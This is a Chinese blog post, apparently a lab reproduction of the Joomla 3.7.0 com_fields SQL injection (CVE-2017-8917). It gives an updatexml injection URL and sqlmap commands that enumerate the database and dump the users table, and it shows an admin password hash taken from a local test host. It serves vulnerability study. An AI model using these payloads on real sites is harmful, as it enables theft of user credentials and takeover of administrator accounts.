Joomla-3.7.0

最新推荐文章于 2024-05-17 09:28:04 发布
最新推荐文章于 2024-05-17 09:28:04 发布
阅读量154 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132766854
版权

joomla __ 3.7.0 __ SQL注入 __ CVE-2017-8917

说明内容
漏洞编号CVE-2017-8917
漏洞名称SQL注入
漏洞评级高危
影响范围Joomla!3.7.0 Core
漏洞描述SQL 注入漏洞是由版本 3.7 中引入的新组件 com_fields 引起的。

漏洞描述

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。

漏洞等级

高危

影响版本

Joomla!3.7.0 Core

漏洞复现

基础环境

根据以下链接进行搭建

[Joomla!3.7.0搭建][https://vulapps.evalbug.com/j_joomla_2/]

image-20230830154207879

漏洞验证

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

image-20230830150327167

sqlamp

当前数据库
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" --current-db

image-20230830161907255

获取数据表
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" --tables

在这里插入图片描述

获取列名
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" -T "#__users" --columns

image-20230830162027466

后台管理员的账号和密码
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" -T "#__users" -C "username,password" --dump

image-20230830155947707

账号:admin
密码:$2y$10$i0wCbNChgRjDq.P9R9gEyOti4W.UVP7zPVgVRyymAlUERd3H3G8qW --

漏洞利用

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。

cgjil
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Joomla_3.7.0-Stable-Full_Package.zip
04-29
代码审计cms安装包,用于交流学习,关联cve-2017-8917文章,请自行下载。
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
weixin_42786460的博客
09-01 1266
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
Joomla 3.7.0 SQL注入漏洞
小小猪的博客
12-01 2095
Joomla 3.7.0 SQL注入漏洞 漏洞描述: 漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。 影响范围: Joomla 3.0.0-3.4.6 环境搭建: 这里采用安鸾渗透实战 地址 漏洞复现: 打开之后页面 安装完成后,构造payload /index.php?option=com_fields&view=fields&layout=modal&list..
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试
sun1296825481的博客
12-11 2950
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试 本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS 一、环境搭建 1、docker的安装 .更新apt包索引 sudo apt-get update .安装以下包以使apt可以通过HTTPS使用存储库(repository) sudo apt-get install -y apt-transport-http...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
huayimy的博客
12-30 1057
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞,com_fields组件,启动docker,安装mysql数据库
Joomla joomla-bee模板
12-06
Joomla-bee模板是专为Joomla设计的一种视觉布局,它提供了自定义网站外观和用户体验的能力。在这个压缩包中,我们看到文件名为“Joomla122”,这可能指的是Joomla的某个特定版本或者与模板相关的组件或安装包。 在...
Joomla-PHP
06-20
<p>Joomla!是一套在国外相当知名的内容管理系统CMS,它属于Portal(企业入口网站)类型,顾名思义,就是比较适合作为商业类型的网站程序。</p><p> </p><p>Joomla特点:</p><p>先进的网站技术的运用</p><p>Joomla!...
bitnami-joomla-3.4.1-0-module-windows-installer
11-15
BitNami是一个开源项目,该项目产生的开源软件包括安装 Web应用程序和解决方案堆栈,以及虚拟设备。bitnami主办Bitrock公司成立于2003年在西班牙塞维利亚,由丹尼尔·洛佩兹Ridruejo。bitnami栈用于安装在Linux,...
joomla-3.1.1
07-31
标题"joomla-3.1.1"表明我们正在讨论的是Joomla的3.1.1版本,这是一个重要的更新,对于了解Joomla的发展历程至关重要。这个版本可能包含了性能优化、新功能和安全修复等改进。 Joomla! 的核心特性在于它的易用性和...
Joomla!3.7.0 Core SQL注入漏洞(更新漏洞环境)
Fly_鹏程万里
04-03 2958
前言 Joomla!是世界上最受欢迎的内容管理系统(CMS)解决方案之一。它可以让用户自定义构建网站实现强大的在线应用程序。据不完全统计互联网上超过3%的网站运行Joomla!,同时它占有全球9%以上的CMS市场份额。 截止至2016年11月,Joomla!的总下载量超过7800万次。目前Joomla!官方还提供了超过7800个扩展插件(含免费、收费插件)及其他的可用资源可供下载。 漏洞等级...
joomla3.7.0sql注入漏洞复现
SUPER131110的博客
08-30 368
[在这里插入图片描述](https://img-blog.csdnimg.cn/在这里插入图片描述。
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 473
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
靶机渗透练习71-DC3
hirak0的博客
04-21 1024
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ Description DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners i
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1254
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
Joomla内核SQL注入漏洞(CVE-2018-8045)
3569
04-01 7480
Joomla! Core SQL注入漏洞NSFOCUS ID39158CVE IDCVE-2018-8045受影响版本Joomla! Joomla! 3.5.0-3.8.5漏洞点评Joomla是一套网站内容管理系统,使用PHP语言和MySQL数据库开发。Joomla! 3.5.0 -3.8.5版本对SQL语句内的变量缺少类型转换,导致User Notes列表视图内SQL注 入漏洞,可使攻击者访问或...
Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917
weixin_51387754的博客
12-01 1029
漏洞简介 com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击 漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/joomla] └─# cd CVE-2017-8917 ┌──(root????guiltyfet)-[/home/guiltyfet/vulhub/joomla/CVE-2017-8917] └─# dock
利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
JiangBuLiu的博客
07-12 4015
@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境) Vulnhub官方复现教程 https://vulhub.org/#/environments/joomla/CVE-2017-8917/ 漏洞原理 com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何...
joomla3.7.0漏洞
05-16
Joomla 3.7.0 版本存在一个漏洞,该漏洞可能允许攻击者在未经授权的情况下上传任意文件,包括恶意文件。该漏洞是由于在文件上传时未正确验证文件扩展名所致。攻击者可以通过上传一个带有.php扩展名的文件,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值